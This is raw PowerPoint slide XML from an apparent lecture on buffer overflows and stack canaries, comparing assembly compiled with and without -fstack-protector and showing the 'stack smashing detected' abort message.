                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s", bar);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    puts(buffer);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F71FA5F2-700C-CF47-B9AC-4C90B9A8C46D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1620830" y="5866140"/>
            <a:ext cx="5650906" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Ken Thompson, “Reflections on Trusting Trust” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://dl.acm.org/doi/10.1145/358198.358210</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32816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par>
                          <p:cTn id="16" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="17" presetID="14" presetClass="entr" presetSubtype="5"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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="31" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="32" presetID="14" presetClass="entr" presetSubtype="5"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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="40" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="41" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="50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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="44" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="45" presetID="9"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animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>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Compiler-Level Protection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduce Stack Canaries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D12E067D-42CB-E748-9D83-953AD181752D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adds code to detect buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pulls randomly-selected value from read-only memory,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>places it between buffer and return address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Before function return, compares value on stack to value in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If values don’t match, buffer overflow occurred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436203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DEB75D-F27F-1C41-9B3F-A0A65D24A5AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code with &amp; without Stack Canary</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:b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9" name="Rounded Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13232C4A-2CBD-7748-BE29-57BD774EF6E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273629" y="1212898"/>
            <a:ext cx="4668909"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leaq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="162AFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    8(%</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endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00FA00"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00FA00"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03FC1476-1F63-034D-B5C5-082379182992}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6684893" y="1212898"/>
            <a:ext cx="4680857"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xorl</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endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC0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jne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     .L6</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r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.L6:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    call    __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stack_chk_fail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{242F89EC-D6C5-314F-86B1-D860DF4CE2AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1086431" y="880807"/>
            <a:ext cx="5043304"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-stack-protector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -S has-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2F05FEB-FDDD-D941-ADEC-062BC6CC7CCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6662270" y="880807"/>
            <a:ext cx="4726101"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-protector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -S has-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rounded Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23E3BFF8-0F80-C24A-A01B-FB392A43EC95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="673857" y="2677324"/>
            <a:ext cx="4305301" cy="1547312"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4305301"/>
              <a:gd name="connsiteY0" fmla="*/ 257890 h 1547312"/>
              <a:gd name="connsiteX1" fmla="*/ 257890 w 4305301"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1547312"/>
              <a:gd name="connsiteX2" fmla="*/ 799250 w 4305301"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1547312"/>
              <a:gd name="connsiteX3" fmla="*/ 1264820 w 4305301"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1547312"/>
              <a:gd name="connsiteX4" fmla="*/ 1844075 w 4305301"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1547312"/>
              <a:gd name="connsiteX5" fmla="*/ 2309645 w 4305301"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 1547312"/>
              <a:gd name="connsiteX6" fmla="*/ 2888900 w 4305301"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 1547312"/>
              <a:gd name="connsiteX7" fmla="*/ 3316575 w 4305301"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 1547312"/>
              <a:gd name="connsiteX8" fmla="*/ 4047411 w 4305301"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 1547312"/>
              <a:gd name="connsiteX9" fmla="*/ 4305301 w 4305301"/>
              <a:gd name="connsiteY9" fmla="*/ 257890 h 1547312"/>
              <a:gd name="connsiteX10" fmla="*/ 4305301 w 4305301"/>
              <a:gd name="connsiteY10" fmla="*/ 773656 h 1547312"/>
              <a:gd name="connsiteX11" fmla="*/ 4305301 w 4305301"/>
              <a:gd name="connsiteY11" fmla="*/ 1289422 h 1547312"/>
              <a:gd name="connsiteX12" fmla="*/ 4047411 w 4305301"/>
              <a:gd name="connsiteY12" fmla="*/ 1547312 h 1547312"/>
              <a:gd name="connsiteX13" fmla="*/ 3581841 w 4305301"/>
              <a:gd name="connsiteY13" fmla="*/ 1547312 h 1547312"/>
              <a:gd name="connsiteX14" fmla="*/ 3078376 w 4305301"/>
              <a:gd name="connsiteY14" fmla="*/ 1547312 h 1547312"/>
              <a:gd name="connsiteX15" fmla="*/ 2537016 w 4305301"/>
              <a:gd name="connsiteY15" fmla="*/ 1547312 h 1547312"/>
              <a:gd name="connsiteX16" fmla="*/ 2071446 w 4305301"/>
              <a:gd name="connsiteY16" fmla="*/ 1547312 h 1547312"/>
              <a:gd name="connsiteX17" fmla="*/ 1454296 w 4305301"/>
              <a:gd name="connsiteY17" fmla="*/ 1547312 h 1547312"/>
              <a:gd name="connsiteX18" fmla="*/ 912936 w 4305301"/>
              <a:gd name="connsiteY18" fmla="*/ 1547312 h 1547312"/>
              <a:gd name="connsiteX19" fmla="*/ 257890 w 4305301"/>
              <a:gd name="connsiteY19" fmla="*/ 1547312 h 1547312"/>
              <a:gd name="connsiteX20" fmla="*/ 0 w 4305301"/>
              <a:gd name="connsiteY20" fmla="*/ 1289422 h 1547312"/>
              <a:gd name="connsiteX21" fmla="*/ 0 w 4305301"/>
              <a:gd name="connsiteY21" fmla="*/ 753025 h 1547312"/>
              <a:gd name="connsiteX22" fmla="*/ 0 w 4305301"/>
              <a:gd name="connsiteY22" fmla="*/ 257890 h 154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05301" h="1547312" fill="none" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="257890"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="-32676" y="113612"/>
                  <a:pt x="126661" y="9642"/>
                  <a:pt x="257890" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="508756" y="-2716"/>
                  <a:pt x="643771" y="13235"/>
                  <a:pt x="799250" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="954729" y="-13235"/>
                  <a:pt x="1134087" y="6197"/>
                  <a:pt x="1264820" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1395553" y="-6197"/>
                  <a:pt x="1680274" y="46210"/>
                  <a:pt x="1844075" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2007876" y="-46210"/>
                  <a:pt x="2179906" y="14923"/>
                  <a:pt x="2309645" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2439384" y="-14923"/>
                  <a:pt x="2643678" y="25317"/>
                  <a:pt x="2888900" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3134122" y="-25317"/>
                  <a:pt x="3156565" y="35806"/>
                  <a:pt x="3316575" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3476585" y="-35806"/>
                  <a:pt x="3690727" y="76215"/>
                  <a:pt x="4047411" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4220090" y="28051"/>
                  <a:pt x="4327104" y="102425"/>
                  <a:pt x="4305301" y="257890"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4332514" y="399112"/>
                  <a:pt x="4288631" y="666486"/>
                  <a:pt x="4305301" y="773656"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4321971" y="880826"/>
                  <a:pt x="4257981" y="1063925"/>
                  <a:pt x="4305301" y="1289422"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4317039" y="1428744"/>
                  <a:pt x="4187844" y="1561137"/>
                  <a:pt x="4047411" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3884815" y="1557869"/>
                  <a:pt x="3694897" y="1547172"/>
                  <a:pt x="3581841" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3468785" y="1547452"/>
                  <a:pt x="3281125" y="1541791"/>
                  <a:pt x="3078376" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2875627" y="1552833"/>
                  <a:pt x="2722103" y="1538533"/>
                  <a:pt x="2537016" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2351929" y="1556091"/>
                  <a:pt x="2302387" y="1538028"/>
                  <a:pt x="2071446" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1840505" y="1556596"/>
                  <a:pt x="1665278" y="1485379"/>
                  <a:pt x="1454296" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1243314" y="1609245"/>
                  <a:pt x="1099779" y="1524954"/>
                  <a:pt x="912936" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="726093" y="1569670"/>
                  <a:pt x="531400" y="1469352"/>
                  <a:pt x="257890" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="108847" y="1539745"/>
                  <a:pt x="8788" y="1422343"/>
                  <a:pt x="0" y="1289422"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-37081" y="1058877"/>
                  <a:pt x="62346" y="900996"/>
                  <a:pt x="0" y="753025"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-62346" y="605054"/>
                  <a:pt x="16870" y="409319"/>
                  <a:pt x="0" y="257890"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="4305301" h="1547312" stroke="0" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="257890"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="-9077" y="109862"/>
                  <a:pt x="78820" y="13752"/>
                  <a:pt x="257890" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="408756" y="-2462"/>
                  <a:pt x="575190" y="51679"/>
                  <a:pt x="875041" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1174892" y="-51679"/>
                  <a:pt x="1156619" y="28381"/>
                  <a:pt x="1378505" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1600391" y="-28381"/>
                  <a:pt x="1686031" y="44446"/>
                  <a:pt x="1844075" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2002119" y="-44446"/>
                  <a:pt x="2239246" y="19348"/>
                  <a:pt x="2423331" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2607416" y="-19348"/>
                  <a:pt x="2763284" y="24083"/>
                  <a:pt x="2926796" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3090309" y="-24083"/>
                  <a:pt x="3380294" y="19349"/>
                  <a:pt x="3543946" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3707598" y="-19349"/>
                  <a:pt x="3917947" y="10587"/>
                  <a:pt x="4047411" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4168513" y="35281"/>
                  <a:pt x="4296480" y="105230"/>
                  <a:pt x="4305301" y="257890"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4321575" y="411851"/>
                  <a:pt x="4292472" y="605132"/>
                  <a:pt x="4305301" y="753025"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4318130" y="900918"/>
                  <a:pt x="4300093" y="1159987"/>
                  <a:pt x="4305301" y="1289422"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4333778" y="1403711"/>
                  <a:pt x="4198403" y="1541791"/>
                  <a:pt x="4047411" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3883693" y="1585487"/>
                  <a:pt x="3624651" y="1494788"/>
                  <a:pt x="3506051" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3387451" y="1599836"/>
                  <a:pt x="3251317" y="1518011"/>
                  <a:pt x="3040481" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2829645" y="1576613"/>
                  <a:pt x="2643749" y="1491091"/>
                  <a:pt x="2499121" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2354493" y="1603533"/>
                  <a:pt x="2139180" y="1513730"/>
                  <a:pt x="1881970" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1624760" y="1580894"/>
                  <a:pt x="1520539" y="1538318"/>
                  <a:pt x="1340610" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1160681" y="1556306"/>
                  <a:pt x="1077023" y="1523899"/>
                  <a:pt x="912936" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="748849" y="1570725"/>
                  <a:pt x="408441" y="1474855"/>
                  <a:pt x="257890" y="1547312"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="149840" y="1526919"/>
                  <a:pt x="-14148" y="1454312"/>
                  <a:pt x="0" y="1289422"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-53521" y="1183709"/>
                  <a:pt x="23561" y="978064"/>
                  <a:pt x="0" y="783971"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-23561" y="589878"/>
                  <a:pt x="24803" y="408233"/>
                  <a:pt x="0" y="257890"/>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0x7fffdf3020a8</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4" name="Rounded Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D8659BA-3618-9844-B401-95CF01317307}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5256737" y="2677324"/>
            <a:ext cx="6935263" cy="1985366"/>
          </a:xfrm>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0x7ffe41c142c0</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stack smashing detected ***: &lt;unknown&gt; terminated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Abort (core dumped)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="375870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DEB75D-F27F-1C41-9B3F-A0A65D24A5AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detecting Buffer Overflow</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03FC1476-1F63-034D-B5C5-082379182992}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6684893" y="1212898"/>
            <a:ext cx="4680857" cy="564510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subq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xorl</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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC0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$.LC1,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$.LC2, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edi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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    $0, %</a:t>
            </a:r>
            <a:r>
